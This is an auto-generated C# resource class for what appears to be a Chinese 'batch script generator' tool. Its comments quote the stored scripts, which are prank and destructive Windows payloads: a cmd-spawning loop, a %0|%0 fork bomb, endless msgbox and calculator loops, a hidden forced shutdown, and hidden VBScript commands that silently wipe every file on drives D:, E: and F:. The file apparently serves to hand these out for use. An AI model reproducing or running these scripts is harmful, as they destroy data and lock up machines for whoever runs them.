//------------------------------------------------------------------------------
// <auto-generated>
//     此代码由工具生成。
//     运行时版本:4.0.30319.42000
//
//     对此文件的更改可能会导致不正确的行为，并且如果
//     重新生成代码，这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------

namespace 批处理脚本生成工具New {
    using System;
    
    
    /// <summary>
    ///   一个强类型的资源类，用于查找本地化的字符串等。
    /// </summary>
    // 此类是由 StronglyTypedResourceBuilder
    // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
    // 若要添加或移除成员，请编辑 .ResX 文件，然后重新运行 ResGen
    // (以 /str 作为命令选项)，或重新生成 VS 项目。
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resource1 {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resource1() {
        }
        
        /// <summary>
        ///   返回此类使用的缓存的 ResourceManager 实例。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("批处理脚本生成工具New.Resource1", typeof(Resource1).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   使用此强类型资源类，为所有资源查找
        ///   重写当前线程的 CurrentUICulture 属性。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   查找类似 :start
        ///start cmd
        ///goto stert 的本地化字符串。
        /// </summary>
        internal static string cmd1 {
            get {
                return ResourceManager.GetString("cmd1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 color a
        ///color b
        ///color c
        ///color d
        ///color e
        ///color f
        ///color 1
        ///color 2
        ///color 3
        ///color 4
        ///color 5
        ///color 6
        ///color 7
        ///color 8
        ///color 9
        ///color 10
        ///color fc
        ///%0 的本地化字符串。
        /// </summary>
        internal static string cmd2 {
            get {
                return ResourceManager.GetString("cmd2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 %0|%0 的本地化字符串。
        /// </summary>
        internal static string cmd3 {
            get {
                return ResourceManager.GetString("cmd3", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 CreateObject
        ///(&quot;SAPI.SpVoice&quot;).Speak &quot;欢迎人间人爱，花见花开，车见车爆胎的主人上线！&quot; 的本地化字符串。
        /// </summary>
        internal static string cmd4 {
            get {
                return ResourceManager.GetString("cmd4", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 dir/s 的本地化字符串。
        /// </summary>
        internal static string cmd5 {
            get {
                return ResourceManager.GetString("cmd5", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 tree d: 的本地化字符串。
        /// </summary>
        internal static string cmd6 {
            get {
                return ResourceManager.GetString("cmd6", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 Do
        ///msgbox( &quot;Hallo,World!!&quot; )
        ///loop 的本地化字符串。
        /// </summary>
        internal static string vbs1 {
            get {
                return ResourceManager.GetString("vbs1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 WScript.Echo(&quot;嘿，谢谢你打开我哦，我等你很久拉！&quot;) 
        ///WScript.Echo(&quot;你是可爱的小朋吗?&quot;) 
        ///WScript.Echo(&quot;哈,我想你拉，这你都不知道吗？&quot;) 
        ///WScript.Echo(&quot;怎么才来，说~是不是不关心我&quot;) 
        ///WScript.Echo(&quot;哼,我生气拉，等你这么久，心都凉啦。&quot;) 
        ///WScript.Echo(&quot;小强很生气，后果很严重哦。&quot;) 
        ///WScript.Echo(&quot;嘿嘿！你也会很惨滴哦&quot;) 
        ///WScript.Echo(&quot;是不是想清除我？&quot;) 
        ///WScript.Echo(&quot;那你要点上50下哦，不过会给你惊喜滴&quot;) 
        ///WScript.Echo(&quot;还剩49下，快点点哦&quot;) 
        ///WScript.Echo(&quot;还剩48下，快点，小笨蛋！&quot;) 
        ///WScript.Echo(&quot;还剩47下对，就这样快点点！&quot;) 
        ///WScript.Echo(&quot;还剩46下。你啊就是笨，要快哦，我先不打扰你工作。&quot;) 
        ///WScript.Echo(&quot;还剩45下，记得要快哦！&quot;) 
        ///WScript.Echo(&quot;还剩43下&quot;) 
        ///WScript.Echo(&quot;还剩42下&quot;) 
        ///WS [字符串的其余部分被截断]&quot;; 的本地化字符串。
        /// </summary>
        internal static string vbs2 {
            get {
                return ResourceManager.GetString("vbs2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 dim WSHshell 
        ///set WSHshell = wscript.createobject(&quot;wscript.shell&quot;) 
        ///WSHshell.run &quot;shutdown -f -s -t 00&quot;,0 ,true  的本地化字符串。
        /// </summary>
        internal static string vbs3 {
            get {
                return ResourceManager.GetString("vbs3", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 set wsh=createobject(&quot;wscript.shell&quot;) 
        ///do 
        ///wsh.run &quot;calc&quot; 
        ///loop  的本地化字符串。
        /// </summary>
        internal static string vbs4 {
            get {
                return ResourceManager.GetString("vbs4", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 dim WSHshell 
        ///set WSHshell = wscript.createobject(&quot;wscript.shell&quot;) 
        ///WSHshell.run &quot;cmd /c &quot;&quot;del d:\*.* / f /q /s&quot;&quot;&quot;,0 ,true 的本地化字符串。
        /// </summary>
        internal static string vbs5 {
            get {
                return ResourceManager.GetString("vbs5", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 dim WSHshell 
        ///set WSHshell = wscript.createobject(&quot;wscript.shell&quot;) 
        ///WSHshell.run &quot;cmd /c &quot;&quot;del e:\*.* / f /q /s&quot;&quot;&quot;,0 ,true 的本地化字符串。
        /// </summary>
        internal static string vbs6 {
            get {
                return ResourceManager.GetString("vbs6", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 dim WSHshell 
        ///set WSHshell = wscript.createobject(&quot;wscript.shell&quot;) 
        ///WSHshell.run &quot;cmd /c &quot;&quot;del f:\*.* / f /q /s&quot;&quot;&quot;,0 ,true 的本地化字符串。
        /// </summary>
        internal static string vbs7 {
            get {
                return ResourceManager.GetString("vbs7", resourceCulture);
            }
        }
    }
}
